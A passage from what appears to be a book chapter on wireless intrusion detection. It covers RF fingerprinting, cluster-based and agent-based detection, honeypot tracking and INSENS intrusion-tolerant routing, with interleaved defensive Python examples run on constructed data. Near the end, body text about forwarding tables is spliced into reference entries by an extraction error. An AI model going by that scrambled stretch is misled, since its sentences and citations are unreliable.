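    phase = _unwrap([math.atan2(q, i) for i, q in iq])      # eq. (2), quadrant-safe tan^-1(q/i)
    inst_freq = [b - a for a, b in zip(phase, phase[1:])]   # rad/sample; stands in for the DWT step
    peak = max(amp) or 1.0
    return {
        "amp_dev": pstdev([a / peak for a in amp]),          # deviation of normalized amplitude
        "phase_dev": pstdev(phase),                          # deviation of (unwrapped) phase
        "freq_mean": mean(inst_freq),                        # carrier offset of this transceiver
        "i_dev": pstdev([i / peak for i, _ in iq]),          # deviation of normalized in-phase data
        "q_dev": pstdev([q / peak for _, q in iq]),          # deviation of normalized quadrature data
    }

def build_profile(training_features):
    """Per-feature mean and spread learned from a MAC address's own prints."""
    profile = {}
    for f in FEATURES:
        vals = [t[f] for t in training_features]
        profile[f] = (mean(vals), max(pstdev(vals), 1e-9))  # floor avoids division by zero
    return profile

def match_probability(features, profile):
    """Classifier stand-in: mean Gaussian score over the features (1.0 = exactly on the profile)."""
    scores = []
    for f in FEATURES:
        mu, sigma = profile[f]
        z = (features[f] - mu) / sigma
        scores.append(math.exp(-0.5 * z * z))
    return mean(scores)

def bayesian_filter(match_probs, prior=0.5, p_match_if_genuine=0.9, p_match_if_other=0.1):
    """Recursive Bayes update of P(genuine transceiver) from noisy per-print
    match/no-match observations; the two error rates are assumed values."""
    post = prior
    for p in match_probs:
        matched = p >= MATCH_THRESHOLD
        like_genuine = p_match_if_genuine if matched else 1 - p_match_if_genuine
        like_other = p_match_if_other if matched else 1 - p_match_if_other
        post = post * like_genuine / (post * like_genuine + (1 - post) * like_other)
    return post

def classify(mac, iq_prints, profiles):
    """Label a series of prints claiming to come from `mac` as normal or anomalous."""
    probs = [match_probability(extract_features(iq), profiles[mac]) for iq in iq_prints]
    post = bayesian_filter(probs)
    return ("normal" if post >= 0.5 else "anomalous"), post

# ---- constructed data: a turn-on transient with device-specific rise time and carrier offset ----
def synth_transient(tau, freq, n=200):
    """Toy transient: amplitude 1 - exp(-t/tau), phase advancing 2*pi*freq per sample."""
    return [((1 - math.exp(-t / tau)) * math.cos(2 * math.pi * freq * t),
             (1 - math.exp(-t / tau)) * math.sin(2 * math.pi * freq * t)) for t in range(n)]

def device_a(d):
    """Transceiver A, with a little print-to-print variability (d in [-1, 1])."""
    return synth_transient(tau=20.0 * (1 + 0.05 * d), freq=0.05 * (1 + 0.05 * d))

def device_b():
    """A different transceiver using A's MAC address."""
    return synth_transient(tau=8.0, freq=0.12)

def demo():
    mac = "00:11:22:33:44:55"                                # constructed address
    training = [extract_features(device_a(-1 + k / 10)) for k in range(21)]
    profiles = {mac: build_profile(training)}
    genuine = classify(mac, [device_a(d) for d in (-0.6, 0.1, 0.7, -0.2, 0.9)], profiles)
    impostor = classify(mac, [device_b() for _ in range(5)], profiles)
    return genuine, impostor

if __name__ == "__main__":
    print(demo())    # ('normal', ~1.0) for A's own prints, ('anomalous', ~0.0) for B's
```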


Figure 1. The enhanced architecture of WIDS
[Figure: blocks Analog/Digital conversion, Feature extractor, Classifier and Bayesian filter; inputs: digital signals and transceiver profiles]

To decide about the status of the transceiver print, the Bayesian filter is applied. This process requires extracting predefined transceiver profiles, which is detailed in the following sub-section.
• Feature extractor: In this step, amplitude and phase components are obtained using equations (1) and (2), respectively:

$a(t) = \sqrt{i(t)^2 + q(t)^2}$ (1)

$\phi(t) = \tan^{-1}\left[\frac{q(t)}{i(t)}\right]$ (2)

Frequency extraction is done by applying the discrete wavelet transform (DWT), for example.
• Classifier: To classify a signal as anomalous, the probability of match has to be determined for each transceiver profile. Therefore, a statistical classifier using neural networks can be used, where the set of extracted features represents a vector and the outputs are a set of matching probabilities.
• Bayesian filter: To decide whether matching probabilities exceed threshold values, a Bayesian filter is applied because of the noise and interference, which are special characteristics of the wireless environment. The Bayesian filter has to estimate the state of a system from noisy observations.
• Feature selection/profile definition: Before applying the detection process, the definition of transceiver profiles has to be made. To do so, features that have low intra-transceiver variability and high inter-transceiver variability are selected. Examples of selected features include: deviations of normalized amplitude, phase and frequency, amplitude variance, and deviations of normalized in-phase data and normalized quadrature data.

Cluster-Based Detection in Ad Hoc Networks

Due to the distributed nature of wireless networks, and especially of ad hoc networks, they are vulnerable to attacks. In this case, intrusion detection provides audit and monitoring capabilities that offer local security to a node and help to perceive specific trust levels of other nodes (Ahmed, Samad, & Mahmood, 2006; Samad, Ahmed, & Mahmood, 2005). Clustering protocols can be taken as an additional advantage in these processing-constrained networks to collaboratively detect intrusions with less power usage and minimal overhead. Because of their relation with routes, existing clustering protocols are not suitable for intrusion detection. Route establishment and route renewal affect clusters. Consequently, processing and traffic overhead increase due to the instability of clusters. Ad hoc networks present battery and power constraints. Therefore, the monitoring node should be available to detect and respond against intrusions in time. This can be achieved only if clusters are stable for a long time period. If clusters are regularly changed due to routes, the intrusion detection will not be efficient. Therefore, a generalized clustering algorithm, detailed in Ahmed et al. (2006), has been discussed. It is also useful to detect collaborative intrusions (Samad et al., 2005).

Cluster Formation

Clusters are formed to divide the network into manageable entities for efficient monitoring and low processing. Clustering schemes result in a

special type of node, called the cluster head (CH), to monitor traffic within its cluster. It not only manages its own cluster, but also communicates with other clusters for cooperative detection and response. It maintains information on every member node (MN) and neighbor cluster. The cluster management responsibility is rotated among the cluster members for load balancing and fault tolerance, and must be fair and secure. This can be achieved by conducting regular elections (Samad et al., 2005). Every node in the cluster must participate in the election process by casting its vote showing its willingness to become the CH. The node showing the highest willingness, by proving the set of criteria, becomes the CH until the next timeout period.

Intrusion Detection Architecture

Because ad hoc networks lack centralized audit points, it is necessary to use the IDS in a distributed manner. This also helps reduce computation and memory overhead on nodes. The proposed clustering algorithm in Samad et al. (2005) can be related to the intrusion detection process, as partial analysis of the incoming traffic is done at the CH and the rest of the analysis is done at the destination node. Traffic analysis at the CH and packet analysis at the MN are helpful in reducing processing at each node. If a malicious activity is found by the CH, it informs its members and the neighboring clusters to take a set of actions. It is the responsibility of the CH to obtain help from and/or inform the MNs and neighboring clusters for a particular intrusion. An undecided node (UD) performs its own audit and analysis; however, it performs only partial analysis immediately after becoming a CH or MN. Intrusion detection techniques can be anomaly based or signature based.

The host-based IDS (HIDS) observes traffic at individual hosts, while network-based IDSs (NIDS) are often located at various points along the network. Since centralized audit points are not available in ad hoc networks, NIDSs cannot be used. Alternatively, if every host starts monitoring intrusions individually, such as in HIDS, a lot of memory and processing will be involved. Therefore, a distributed approach is used to perform monitoring, where both CH and MN collect audit data.

A flow model of the intrusion detection architecture of cluster-based intrusion detection (CBID) is illustrated by Figure 2, which consists of four modules. Information collected during the training phase in the logging module is transferred to the intrusion information module to perceive a threshold value for the normal traffic. If this is the case, an alert is generated by the intrusion response module.
• Logging: The CH captures and logs all the traffic transferred through its radio range. It keeps the necessary fields and the data related to traffic, such as the number of packets sent, received, forwarded, or dropped, in a database. The traffic can either be data traffic or control traffic. These logs can be helpful for the detection of many attacks, such as blackhole, wormhole, sleep deprivation, malicious flooding, packet dropping, and so forth.
• Intrusion information: If signature-based detection is used, every node must maintain

Figure 2. Intrusion detection process


a database that contains all the intrusion signatures. For anomaly based detection, the anomalous behaviors must also be well defined.
• Intrusion detection: By this module, the node detects intrusions by analyzing and comparing the traffic patterns with the normal behavior. If an anomaly is found, the CH generates an alarm, increases the monitoring level, and analyzes the traffic in more detail to find out the attack type and the identity of the attacker.
• Intrusion response: To inform about detected intrusions, nodes generate alerts. They can also provide responses to react against them.

DETECTION MODELS

To enhance IDS efficiency, theories and models have been developed to cope with intrusion correlation; action tracking and packet marking; digital investigation using evidence based on alerts; and attack reconstruction in wireless environments. The evidence is defined as a set of relevant information about the network state (Aime, Calandriello, & Lioy, 2006).

Intrusion and Anomaly Detection Model Exchange

This section discusses the anomaly model used in mobile ad hoc networks (MANETs). It is based on model distribution and on model profiling and aggregation.

Model Distribution

Due to the lack of battery power or computation ability, a MANET model is required. Depending on the location of the node performing intrusion detection, the following distribution models can be adopted (Cretu, Parekh, Wang, & Stolfo, 2006):
• In the case of generating anomalies, training can be done by MANET nodes: (1) if the MANET nodes have WAN connectivity, the node can initiate download requests to obtain the latest model from the server; and (2) without WAN connectivity, MANET nodes can be initialized before deployment, where the default model is used.
• Another model consists in deploying a more powerful MANET node with sufficient processing and battery power to perform anomaly training. The node would listen promiscuously to all visible traffic on the MANET, generate anomalies, and distribute them to the peers.
• Use a pre-computed anomaly model. This scenario is the worst case, but can be practical in situations where the MANET's behavior is well-defined and follows a standard protocol definition.

Model Aggregation/Profiling

The aggregation model, previously used in MANETs for alerts, demonstrated that, by integrating security-related information at the protocol level from a wider area, the false positive rate and the detection rate can be improved (Cretu et al., 2006).

In addition, model aggregation enables peers to determine whether or not to communicate with a particular node n1. If the peers' models are very similar to those used by n1, it suggests that the node is performing similar tasks. A node with a dissimilar model is considered suspicious and as having malicious content. For example, a node sending out worm packets will generate a substantially different content distribution. This can be done via comparison (Cretu et al., 2006).

Anomaly Based Detection Models

In this section, we discuss how to build anomaly detection models for wireless networks. Detection based on different kinds of activities may differ in the format and the amount of available audit data as well as in the modeling algorithms. However, we admit that the principle behind the approaches will be the same. Therefore, we discuss in this section

only one of these approaches, which is based on a routing protocol (Zhang, Lee, & Huang, 2003):

Building an Anomaly Detection Model

This method uses information-theoretic measures, namely entropy and conditional entropy, to describe normal information flows, and uses classification algorithms to build anomaly detection models. When constructing a classifier, features with high information gain or reduced entropy are needed. Therefore, a classifier needs feature value tests to partition the original dataset into low entropy subsets. Using this framework, the following procedure for anomaly detection is applied (Zhang et al., 2003): (1) select audit data so that the normal dataset has low entropy; (2) perform appropriate data transformation according to the entropy measures; (3) compute a classifier using training data; (4) apply the classifier to test data; and (5) post-process alarms to produce intrusion reports.

Detecting Abnormal Updates to Routing Tables

The main requirement of an anomaly detection model used by IDSs is a low false positive rate, calculated as the percentage of legitimate behavior variations detected as anomalies. Since the main concern for ad hoc routing protocols is that the false routing information generated by a compromised node will be disseminated to and used by the other nodes, the trace data can be designed for each node. A routing table contains, at the minimum, the next hop and the distance in hop number. A legitimate change in the routing table can be caused by physical node movement or network membership changes. For a node, its own movement and the change in its own routing table are the only reliable and trustable information. Hence, the data used consist of the node's physical movements and the corresponding change in its routing table as the basis of the trace data. The physical movement is measured mainly by distance and velocity. The routing table change is measured mainly by the percentage of changed routes (PCR), the percentage of changes in the sum of hops of all the routes (PCH), and the percentage of newly added routes (Zhang et al., 2003). These measurements are used because of the dynamic nature of mobile networks. The normal profile on the trace data specifies the correlation of the physical movements of the node and the changes in the routing table.

Classification rules for PCR and PCH describe normal conditions of the routing table. These rules can be used as normal profiles. Checking an observed trace data record against the profile involves applying the classification rules to the record. Therefore, repeated trials may be needed before a good anomaly detection model is produced.

Detecting Abnormal Activities in Other Layers

Detecting anomalies for other entities of the wireless networks, such as MAC protocols or entities provided by the network (applications and services), follows a similar approach as in the physical layer. For example, the trace data for MAC protocols can contain the following features: for the past s seconds, the total number of channel requests, the total number of nodes making the requests, and the largest, the mean, and the smallest of all the requests. The class can be the range of the current requests by a node. A classifier on this trace data describes the normal context of a request. An anomaly detection model can then be computed, as a classifier or clusters, from the deviation data. Similarly, at the mobile application layer, the trace data can use the service as the class (Zhang et al., 2003).

WIRELESS INTRUSION DETECTION SYSTEM ARCHITECTURES

This section discusses the proposed models, architectures, and methods to validate the used approaches.

Wireless Intrusion Tracking System

The wireless intrusion tracking system (WITS) deploys the Linksys WRT54G AP, Linux and other open source tools in order to track wireless intruders

in a wireless cell. A WITS is designed to minimize the effect of attacks against wireless networks. It combines technologies to produce a system that allows real-time tracking of intruders and extensive forensic data gathering (Valli, 2004).
• Sacrificial access points (SAP): WITS uses the concept of SAPs, which act as wireless honeypots and forensic logging devices. The used SAP has conventional wired Ethernet capability. Its functionality is severely limited for deployment as a honeypot device. However, it permits the installation of customized firmware, which allows the reduction of installed facilities used as part of the routing and AP functionality for the WRT54G. The firmware can be upgraded to patch any new vulnerabilities or weaknesses. To be successful, the system must retain large, extensive and multiple log files that contain system statistics and sufficient network-related data for forensic reconstruction of any traffic. The used data are data located in honeypot log files, snort data, and data provided by traffic analysis. The data in honeypot log files will indicate the level of probing and malicious activity. Traffic analysis provides an extensive analysis of the intruder activity.
• Tracking the intruder: Wireless intruders have the ability to be mobile and are not constrained to use predefined channels, which makes them difficult to track. Furthermore, wireless attackers can manipulate layer 1 and layer 2 of the OSI model to mask activities and subsequent detection. WITS uses GPS techniques to locate and track intruders within the wireless cell. The resultant GPS data will be stored for later analysis or used by an immediate location process of the attacking device.

Agent-Based IDS for Ad Hoc Wireless Networks

This section introduces a multi-sensor IDS that employs a cooperative detection algorithm. A mobile agent implementation is chosen to support the wireless IDS features such as sensor mobility and intelligent routing of intrusion data throughout the network.

Modular IDS Architecture

The proposed IDS is built on a mobile agent framework. It employs several sensor types that perform specific functions, such as:
• Network monitoring: Only certain nodes will have sensor agents for network monitoring, in order to preserve the total computational power and the battery power of mobile hosts.
• Host monitoring: Every node on the ad hoc network will be monitored internally by a host-monitoring agent. This includes monitoring system-level and application-level operations.
• Decision-making: Every node will decide on the intrusion threat level on a host-level basis. Specific nodes will collect intrusion information and make collective decisions about the intrusion level.
• Reacting: Every node can react in order to protect the host against detected attacks. Reactions can be predefined at that node.

To minimize power consumption and IDS-related processing time, the IDS must be distributed. A hierarchy of agents can be used to this end. A hierarchy of agents is composed of three agent classes, which are the monitoring agents, decision-making agents, and action agents. Some are present on all mobile hosts, while others are distributed to only selected nodes (Kachirski & Guha, 2003). Cluster heads, for example, are the typical nodes implementing the monitoring agents. The node selection is naturally dependent on the security requirements imposed on the mobile nodes.

Intrusion Response

The nature of an intrusion response for ad hoc networks depends on the intrusion type and on the network protocols and application types. Examples of responses can be:

• Re-initializing communication channels between nodes
• Identifying the compromised nodes and re-organizing the network to preclude the compromised nodes
• Notifying the end user and taking appropriate action
• Sending a re-authentication request to all nodes in the network to prompt the end-users to authenticate themselves (Zhang et al., 2003)

DISTRIBUTED INTRUSION DETECTION

Any distributed IDS should enforce mechanisms that support the reliability of its nodes as well as the distributed analysis, integrity, and privacy of exchanged alerts. Several critical problems should be addressed to provide collaborative methods for wireless distributed intrusion detection. These problems include the reduction of the volume of alerts; the decrease of the complexity of communication and bandwidth requirements; and the management of the heterogeneity of formats and protocols.

IDS for Public WiFi System

The IDS used by the WiFi systems bases its detection on network monitoring to produce evidence and share it among all nodes.

The monitor can be thought of as an instance of the Ethereal network packet sniffer. For each captured packet, Ethereal displays a complete view of the packet content and adds some general statistics, such as a timestamp, frame number, and length in bytes. By looking at the Ethernet level header and focusing on 802.11 frames, the source, destination and BSSID addresses; SN; frame type and subtype; and the retry flag are distinguished. Other parameters are added, such as counters for transmission retries and for frames received with wrong FCS, and the packet transmission time. In this way, a list of events is built and matched to detect, in particular, jamming attacks and channel failures. Since all nodes participate in the detection process, multiple lists are matched to combine the two lists into a single list of events (Aime et al., 2006).

Multi-Layer Integrated Intrusion Detection and Response

Given that there are different kinds of vulnerabilities in mobile network layers, coordinating IDSs across layers is required. The following integration scheme can be investigated:
• If a node detects an intrusion that affects the entire network, it initiates the re-authentication process to exclude the compromised/malicious nodes from the network.
• If a node detects a local intrusion at a higher layer, lower layers are notified.

In this approach, the detection on one layer can be initiated from other layers. To do this, the lower layers need more than one anomaly detection model: one that relies on the data of the current layer and one that considers information from the upper layer (Zhang et al., 2003).

WIRELESS TOLERANCE AND PREVENTION

Intrusion prevention is considered an extension of intrusion detection technology, but it is actually another form of access control, like an application layer firewall. Intrusion prevention systems (IPSs) were developed to resolve ambiguities in passive network monitoring by placing detection systems online. Showing a considerable improvement upon firewall technologies, IPSs make access control decisions based on application content, rather than IP address or ports, by denying potentially malicious activity. There are advantages and disadvantages to host-based IPS compared with network-based IPS.

Some IPSs can also prevent yet-to-be-discovered attacks, such as those caused by a buffer overflow. Deployed to strengthen wireless security, wireless IPSs monitor radio frequencies in order to detect malicious traffic.

The development and support of intrusion-aware survivable applications in wireless networks are key problems in the provision of wireless services.
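The per-node event lists of the IDS for public WiFi systems described above, merged and matched to separate jamming from a local channel failure, together with the sequence-number continuity check from the Monitoring Wireless Devices section; an added example, not the chapter's or the cited authors' code. The window size, the retry/FCS ratios, the jamming-versus-failure rule, the SN gap and the capture data are all assumptions.

```python
"""Event lists from several monitors, merged to detect jamming versus local
channel failure, plus a per-source 802.11 sequence-number continuity check."""
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class Frame:
    """Fields the monitor keeps from one captured 802.11 frame (constructed schema)."""
    ts: float       # capture timestamp in seconds
    node: str       # monitoring node that captured the frame
    src: str
    dst: str
    bssid: str
    sn: int         # 12-bit sequence number
    ftype: str      # management / control / data
    subtype: str
    retry: bool     # Retry bit of the frame control field
    fcs_ok: bool    # False when the frame check sequence did not verify
    length: int

def build_event_list(frames, window=1.0):
    """One event per (node, time window): frame count plus retry and bad-FCS counters."""
    events = defaultdict(lambda: {"frames": 0, "retries": 0, "bad_fcs": 0})
    for f in frames:
        e = events[(f.node, int(f.ts // window))]
        e["frames"] += 1
        e["retries"] += int(f.retry)
        e["bad_fcs"] += int(not f.fcs_ok)
    return dict(events)

def merge_event_lists(*lists):
    """Match the lists built by different nodes into one list keyed by window."""
    merged = defaultdict(dict)
    for lst in lists:
        for (node, w), e in lst.items():
            merged[w][node] = e
    return dict(merged)

def _degraded(e, retry_ratio=0.5, bad_fcs_ratio=0.3):
    """Assumed thresholds for a window in which the channel was unusable at a node."""
    return (e["retries"] / e["frames"] >= retry_ratio
            or e["bad_fcs"] / e["frames"] >= bad_fcs_ratio)

def detect_channel_problems(merged, min_nodes=2):
    """Jamming degrades every listening node at once; one degraded node among
    healthy peers points at a local channel failure (assumed rule)."""
    alerts = []
    for w in sorted(merged):
        bad = sorted(n for n, e in merged[w].items() if _degraded(e))
        if len(bad) >= min_nodes and len(bad) == len(merged[w]):
            alerts.append(("jamming", w, bad))
        elif bad:
            alerts.append(("channel_failure", w, bad))
    return alerts

def detect_sn_anomalies(frames, max_gap=64):
    """An impersonator using a station's MAC address cannot continue that station's
    SN series: flag a source whose SN jumps back or far ahead. Tracked per monitor
    so that one frame heard by several monitors is not itself a jump."""
    last, alerts = {}, []
    for f in sorted(frames, key=lambda x: x.ts):
        key = (f.node, f.src)
        if key in last:
            gap = (f.sn - last[key]) % 4096          # the SN counter wraps at 4096
            if gap > max_gap:                         # gap 0 is a retransmission, not a jump
                alerts.append(("sn_anomaly", f.node, f.src, last[key], f.sn))
        last[key] = f.sn
    return alerts

def constructed_capture():
    """Constructed sample: three monitors, ten frames per one-second window 0-3.
    Windows 0-1 are clean; in window 2 every monitor sees retries and bad FCS
    (jamming); in window 3 only mon-C does (local failure). At t=4 a frame with
    the station's MAC arrives carrying an unrelated SN, as MAC spoofing would."""
    sta, ap = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:01"
    frames = []
    for w in range(4):
        for k in range(10):
            for node in ("mon-A", "mon-B", "mon-C"):
                bad = w == 2 or (w == 3 and node == "mon-C")
                frames.append(Frame(w + k / 10, node, sta, ap, ap, 1000 + 10 * w + k, "data",
                                    "data", retry=bad and k % 2 == 0,
                                    fcs_ok=not (bad and k % 2 == 1), length=120))
    for node in ("mon-A", "mon-B", "mon-C"):
        frames.append(Frame(4.0, node, sta, ap, ap, 17, "data", "data", False, True, 120))
    return frames

def run_demo():
    frames = constructed_capture()
    per_node = [build_event_list([f for f in frames if f.node == n])
                for n in ("mon-A", "mon-B", "mon-C")]
    return detect_channel_problems(merge_event_lists(*per_node)), detect_sn_anomalies(frames)

if __name__ == "__main__":
    channel_alerts, sn_alerts = run_demo()
    print(channel_alerts)   # jamming in window 2 at all monitors, channel_failure in window 3 at mon-C
    print(sn_alerts)        # one sn_anomaly per monitor: SN 1039 followed by 17
```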

Significant aspects of intrusion tolerance include: (1) the ability to adapt to changes in environmental and operational conditions for surviving intrusions; (2) the coordination and management of adaptation of changes in service provision; (3) the awareness of resource statuses to respond to attack symptoms effectively; and (4) the management of resource redundancy. The following are two approaches that deploy intrusion tolerance to prevent wireless attacks.

Intrusion Tolerance Based on Multiple Base Station Redundancy

To provide fault tolerance, this research discusses redundancy in the form of multiple base stations (BSs). Since an adversary can disallow delivery of sensor data that is routed over only one path to a given BS, multi-path routing redundancy to improve the intrusion tolerance of wireless nodes is introduced (Deng, Han, & Mishra, 2004).

The simplest way to set up multiple paths from each node to multiple BSs is to use a flooding message: each BS broadcasts a unique request message, called REQ. Upon the reception of a REQ from a BS, a node records the packet sender as its parent node for that BS, and re-broadcasts the REQ to its neighbor and child nodes. The node then ignores all copies of the same REQ that it receives later. In this way, the REQ generated by a BS will be able to flood the entire network, even though the network nodes forward that message only once. If one BS broadcasts its own REQ, every sensor node will have one path to it. However, this scheme cannot prevent a malicious compromised node from BS spoofing by sending a forged REQ. Every node will think that the forged message is generated by the legitimate BS and will forward the forged REQ. To defend against such an attack, each BS can authenticate the sent REQ (Deng et al., 2004).

INSENS: Intrusion-Tolerant Routing in Wireless Sensor Networks

INSENS (Deng, Han, & Mishra, 2003, 2005) can be used to prevent DoS attacks, where individual nodes are not allowed to broadcast routing data. Only the BS is allowed to broadcast (Deng et al., 2003). It proposes a BS authentication using a hash function. To prevent DoS/distributed denial of service (DDoS) broadcast attacks, unicast packets must first traverse through the BS. Second, the control routing information has to be authenticated and encrypted by using symmetric cryptography. To address the notion of compromised nodes, redundant multipath routing is built into INSENS to achieve secure routing.

INSENS proceeds through two phases, route discovery and data forwarding. The first phase discovers the sensor network topology, while the second deals with forwarding data from sensor nodes to the BS, and vice versa. Route discovery is performed in three rounds:
• During the first round, the BS floods a request message to all the reachable sensor nodes in the network. The BS broadcasts a request message that is received by all its neighbors. A sensor receiving a request message for the first time records the identity of the sender in its neighbor set and then broadcasts a request message. Two mechanisms are used to counter attacks. The first one identifies the request message initiated by the BS using a hash. The second mechanism configures sensors with separate pre-shared keys, applying a keyed MAC algorithm to the complete path (Deng et al., 2005).
• During the second round, the sensor nodes send their local information using a feedback message to the BS. After a node has forwarded its request message, it waits a time period before generating a feedback message.
• In the third round, forwarding tables are computed by the BS for each sensor node based on the information received in the second round. Then, it sends them to the respective nodes using a routing update message and waits for a certain period to collect the connectivity information received via feedback messages in order to compute possible paths to each other node. The BS then updates the forwarding tables using entries of the form (destination, source, immediate sender).
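Route discovery as described for the multiple-base-station scheme and INSENS, as an added example (not the chapter's or the cited authors' code): an authenticated REQ flood in which each sensor keeps one parent per BS and forwards a genuine REQ only once, keyed-MAC feedback to the BS, and forwarding-table entries of the form (destination, source, immediate sender) checked before a packet is relayed. A one-way SHA-256 hash chain for BS authentication, HMAC-SHA256 for the feedback, and the topology and keys are assumptions.

```python
"""REQ flooding with BS authentication, authenticated feedback, and forwarding tables."""
import hashlib
import hmac
from collections import deque

def hash_chain(seed, length):
    """chain[k] = H(chain[k-1]); sensors hold chain[-1], the BS reveals chain[-2], chain[-3], ..."""
    chain = [hashlib.sha256(seed).digest()]
    for _ in range(length - 1):
        chain.append(hashlib.sha256(chain[-1]).digest())
    return chain

class Sensor:
    def __init__(self, nid, anchors, key):
        self.id, self.key = nid, key
        self.anchor = dict(anchors)   # bs_id -> last accepted REQ token (initially the preloaded anchor)
        self.parent = {}              # bs_id -> neighbor the REQ was first heard from
        self.neighbors = set()
        self.forwarding = set()       # entries (destination, source, immediate sender)

    def accept_req(self, bs_id, token, sender):
        """Return True only for the first copy of a genuine REQ; that copy is re-broadcast."""
        current = self.anchor.get(bs_id)
        if token == current:                       # another copy of an already-accepted REQ
            self.neighbors.add(sender)
            return False
        if current is None or hashlib.sha256(token).digest() != current:
            return False                           # forged REQ: dropped, never forwarded
        self.anchor[bs_id] = token                 # advance the chain for this BS
        self.neighbors.add(sender)
        self.parent[bs_id] = sender
        return True

def flood_request(bs_id, token, topology, sensors):
    """Round 1: the BS broadcasts REQ; each sensor re-broadcasts a genuine REQ once."""
    queue = deque((nbr, bs_id) for nbr in topology[bs_id])
    while queue:
        node, sender = queue.popleft()
        if sensors[node].accept_req(bs_id, token, sender):
            queue.extend((nbr, node) for nbr in topology[node] if nbr in sensors)

def feedback(sensor, bs_id):
    """Round 2: local connectivity, bound to the sensor with its pre-shared key."""
    msg = f"{sensor.id}|{sensor.parent[bs_id]}|{','.join(sorted(sensor.neighbors))}".encode()
    return sensor.id, msg, hmac.new(sensor.key, msg, hashlib.sha256).digest()

def bs_build_tables(bs_id, feedbacks, keys, sensors):
    """Round 3: the BS installs (destination, source, immediate sender) entries along each path."""
    parents = {}
    for nid, msg, tag in feedbacks:
        expected = hmac.new(keys[nid], msg, hashlib.sha256).digest()
        if hmac.compare_digest(tag, expected):     # tampered or misattributed feedback is ignored
            parents[nid] = msg.decode().split("|")[1]
    for src in parents:
        prev, hop = src, parents[src]
        while hop != bs_id and hop in parents:
            sensors[hop].forwarding.add((bs_id, src, prev))
            prev, hop = hop, parents[hop]
    return parents

def forward(sensor, destination, source, immediate_sender):
    """Data forwarding: a packet is relayed only if a matching entry exists."""
    return (destination, source, immediate_sender) in sensor.forwarding

def demo():
    chain = hash_chain(b"constructed-seed", 4)
    keys = {f"s{i}": f"constructed-key-{i}".encode() for i in range(1, 5)}
    sensors = {nid: Sensor(nid, {"bs0": chain[-1]}, keys[nid]) for nid in keys}
    topology = {"bs0": ["s1", "s2"], "s1": ["bs0", "s3"], "s2": ["bs0", "s3"],
                "s3": ["s1", "s2", "s4"], "s4": ["s3"]}          # constructed topology
    flood_request("bs0", chain[-2], topology, sensors)
    # a compromised s3 tries BS spoofing with a REQ it cannot authenticate
    forged_accepted = sensors["s4"].accept_req("bs0", b"not from the BS", "s3")
    fb = [feedback(sensors[n], "bs0") for n in sensors]
    nid, msg, tag = fb[0]
    fb.append((nid, msg.replace(b"bs0", b"s4"), tag))   # tampered copy claiming a different parent
    parents = bs_build_tables("bs0", fb, keys, sensors)
    return {"parents": parents, "forged_accepted": forged_accepted,
            "s3_relays_s4": forward(sensors["s3"], "bs0", "s4", "s4"),
            "s3_relays_spoofed_hop": forward(sensors["s3"], "bs0", "s4", "s2")}

if __name__ == "__main__":
    print(demo())
```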


(destination, source, and immediate sender). Barbeau, M., Hall, J., & Kranakis, E. (2006, Octo-
ber 4-6). Detection of rogue devices in Bluetooth
Destination is the node ID of the destina- networks using radio frequency fingerprinting.
tion node, source is the node ID of the nodeIn Proceedings of the 3rd IASTED International
that created this data packet, and immediateConference on Communications and Computer
Networks. Lima, Peru.
sender is the ID of the node that just forwarded
this packet. Once the data packet is received,
Boncella, R. J. (2006). Wireless threats and attacks.
a node searches for a matching entry in its
In H. Bidgoli (Ed.), Handbook of information se-
forwarding table. If it finds a match, then
curity (pp. 165-175). John Wiley & Sons.
it forwards the data packet (Deng et al.,
2005). Cretu, G. F., Parekh, J. J., Wang, K., & Stolfo, S.
CONCLUSION

We have shown in this chapter that WIDSs have an important role in securing the network by protecting its entities against intrusions and misuse. The protection is performed based on models capable of providing a framework for the description and correlation of attacks. Research works have focused on the development of techniques, approaches, and mechanisms, and WIDS architectures. Architectures include radio frequency fingerprinting, cluster-based detection, mobile devices monitoring, and mobile profile construction. Wireless intrusion prevention and tolerance are also discussed in this chapter, and systems such as INSENS are developed. In addition, we have shown that several challenges need to be addressed to enhance the efficiency of WIDSs.

REFERENCES

Ahmed, E., Samad, K., & Mahmood, W. (2006). Cluster-based intrusion detection (CBID) architecture for mobile ad hoc networks. In Proceedings of AusCERT Asia Pacific Information Technology Security Conference (AusCERT), Asia.

Aime, M. D., Calandriello, G., & Lioy, A. (2006, June 26-29). A wireless distributed intrusion detection system and a new attack model. In Proceedings of the 11th Symposium in Computers and Communications (pp. 35-40). Italy.

Barbeau, M., Hall, J., & Kranakis, E. (2006, October 4-6). Detection of rogue devices in Bluetooth networks using radio frequency fingerprinting. In Proceedings of the 3rd IASTED International Conference on Communications and Computer Networks. Lima, Peru.

Boncella, R. J. (2006). Wireless threats and attacks. In H. Bidgoli (Ed.), Handbook of information security (pp. 165-175). John Wiley & Sons.

Cretu, G. F., Parekh, J. J., Wang, K., & Stolfo, S. J. (2006, January 10-12). Intrusion and anomaly detection model exchange for mobile ad-hoc networks. In The third IEEE Consumer Communications & Networking Conference (CCNC).

Deng, J., Han, R., & Mishra, S. (2003, May). INSENS: Intrusion-tolerant routing in wireless sensor networks. In The 23rd IEEE International Conference on Distributed Computing Systems (ICDCS). Providence.

Deng, J., Han, R., & Mishra, S. (2004, June 28-July 1). Intrusion tolerance and anti-traffic analysis strategies for wireless sensor networks. In Proceedings of the 2004 International Conference on Dependable Systems and Networks (DSN'04) (pp. 637-646). Italy.

Deng, J., Han, R., & Mishra, S. (2005). INSENS: Intrusion-tolerant routing for wireless sensor networks [Special issue]. Computer Communications Journal, 29(2), 216-230.

Farshchi, J. (2003). Wireless policy development (part 1 & 2). Security Focus. Retrieved from http://www.securityfocus.com/print/infocus/1732 and http://www.securityfocus.com/print/infocus/1735

Gupta, V., Krishnamurthy, S., & Faloutsos, M. (2002, October). Denial of service attacks at the MAC layer in wireless ad hoc networks. Anaheim, CA: MILCOM—Network Security.

Hall, J., Barbeau, M., & Kranakis, E. (2005, February 3-4). Using mobility profiles for anomaly-based intrusion detection in mobile networks. Paper presented at the 12th Annual Network and Distributed System Security Symposium, San Diego, CA.

Hutchison, K. (2004). Wireless intrusion detection systems. Retrieved October 18, 2004, from http://www.sans.org/reading_room/whitepapers/wireless/

Kachirski, O., & Guha, R. (2003, January 6-9). Effective intrusion detection using multiple sensors in wireless ad hoc networks. In Proceedings of the 36th Hawaii International Conference on System Sciences (HICSS'03). Hawaii.

Low, C. (2005). Understanding wireless attacks & detection. Retrieved April 2005, from http://www.hackerscenter.com/public/Library/782_wireattacks.pdf

